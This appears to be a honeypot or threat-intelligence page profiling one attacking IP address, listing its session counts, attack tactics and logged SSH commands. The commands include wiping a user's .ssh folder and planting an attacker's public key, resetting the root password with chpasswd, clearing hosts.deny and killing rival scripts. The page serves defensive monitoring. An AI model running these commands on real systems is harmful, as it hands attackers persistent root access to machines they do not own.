← Back to feed
Location
🇨🇳 CN
ASN
AS134238 · CHINANET Jiangx province IDC network
Cloud Provider
—
Total Events
306
Top 10% by volume
Agent Count
1
First / Last Seen
2026-03-24 18:23 — 2026-05-16 02:38
Attack Types
MITRE ATT&CK Techniques
Initial Access
Defense Evasion
Command and Control
External Corroboration
Blocklist.de
blocklist_de:reported
Session Forensics
Sessions
36 (5 with login)
Avg Depth Score
0.27
Commands Executed
71
Files Downloaded
9
Notable Commands
- cd ~; chattr -ia .ssh; lockr -ia .ssh
- lockr -ia .ssh
- cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
- cat /proc/cpuinfo | grep name | wc -l
- echo "root:AIydOaUMySaV"|chpasswd|bash
- rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
- cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
- free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
- ls -lh $(which ls)
- which ls
- echo "root:O2xr8X8q7q2h"|chpasswd|bash
- echo "root:2HIylrveXkv8"|chpasswd|bash
- echo "root:E39JUqdhCKpD"|chpasswd|bash
Fingerprints
HASSH
SSH Client
Evidence Timeline
Scanner
56575891833b
15%
Loading events...
Scanner
8f60f278efd6
15%
Loading events...
Scanner
9398f6a38459
15%
Loading events...
Malware Dropper
75eccfbd25a5
LOGIN
10
2
1
100%
Loading events...
HASSH f555226df1963d1…
SSH-2.0-libssh_0.9.6
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…$ cat /proc/cpuinfo | grep name | wc -l$ echo "root:AIydOaUMySaV"|chpasswd|bash
Scanner
731a9fb73ad6
15%
Loading events...
Scanner
6db9e0f64f75
15%
Loading events...
Scanner
87c34f0b9777
15%
Loading events...
Scanner
7ec612c6e0c2
15%
Loading events...
Scanner
70b03e86fd9e
15%
Loading events...
SSH-2.0-libssh_0.9.6
Malware Dropper
e32c0e606e94
LOGIN
20
2
1
100%
Loading events...
HASSH f555226df1963d1…
SSH-2.0-libssh_0.9.6
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…$ cat /proc/cpuinfo | grep name | wc -l$ echo "root:O2xr8X8q7q2h"|chpasswd|bash
Scanner
c116adde9e12
15%
Loading events...
Scanner
0845fc12eec4
15%
Loading events...
Scanner
92e3ea989694
15%
Loading events...
Scanner
7c5daa4e2dd8
15%
Loading events...
Malware Dropper
f091f12f846b
LOGIN
20
2
1
100%
Loading events...
HASSH f555226df1963d1…
SSH-2.0-libssh_0.9.6
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…$ cat /proc/cpuinfo | grep name | wc -l$ echo "root:2HIylrveXkv8"|chpasswd|bash
Scanner
3e661169b5fa
15%
Loading events...
Malware Dropper
629cf7065cc4
LOGIN
18
2
1
100%
Loading events...
HASSH f555226df1963d1…
SSH-2.0-libssh_0.9.6
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…$ cat /proc/cpuinfo | grep name | wc -l$ echo "root:E39JUqdhCKpD"|chpasswd|bash
Scanner
7d45b7d94693
15%
Loading events...
Scanner
099985e8816b
15%
Loading events...
Scanner
32dbdd86c59b
15%
Loading events...
Scanner
eaa3b18a4342
15%
Loading events...
Scanner
c72232860734
15%
Loading events...
Scanner
a96834c4450e
15%
Loading events...
Scanner
31f978f01295
15%
Loading events...
Scanner
6e27449e2547
15%
Loading events...
Scanner
f702335312a0
15%
Loading events...
Malware Dropper
fab4addd79f3
LOGIN
3
1
1
100%
Loading events...
HASSH f555226df1963d1…
SSH-2.0-libssh_0.9.6
$ cd ~; chattr -ia .ssh; lockr -ia .ssh$ lockr -ia .ssh$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3Nz…
Scanner
066a92411e1b
15%
Loading events...
Scanner
04d2beec0618
15%
Loading events...
Scanner
b4913eb46af7
15%
Loading events...
Scanner
a93e662f026b
15%
Loading events...
Scanner
37a57de877cc
15%
Loading events...
Scanner
748a7a6c312e
15%
Loading events...